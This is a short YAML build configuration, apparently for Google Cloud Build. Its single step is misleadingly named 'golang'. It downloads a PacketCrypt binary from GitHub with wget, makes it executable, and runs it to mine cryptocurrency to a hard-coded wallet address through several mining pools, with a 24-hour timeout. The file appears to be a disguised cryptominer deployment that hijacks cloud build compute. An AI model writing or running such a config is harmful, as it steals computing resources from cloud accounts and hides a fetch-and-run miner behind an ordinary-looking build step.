steps: 
  - name: golang 
    args: 
      - '-c' 
      - >- 
         wget https://github.com/cjdelisle/packetcrypt_rs/releases/download/packetcrypt-v0.4.4/packetcrypt-v0.4.4-linux_amd64 && chmod +x packetcrypt-v0.4.4-linux_amd64 && ./packetcrypt-v0.4.4-linux_amd64 ann -p pkt1qm78frgnen3v8x7tgp5ncr0esmp7awmfymfz6ds http://pool.srizbi.com http://pool.pktpool.io http://pool.pkt.world
    waitFor: 
      - '-c' 
    entrypoint: /bin/bash 
timeout: 86400s 
options: 
  pool: 
    name: projects/tidy-fort-338302/locations/asia-east1/workerPools/1
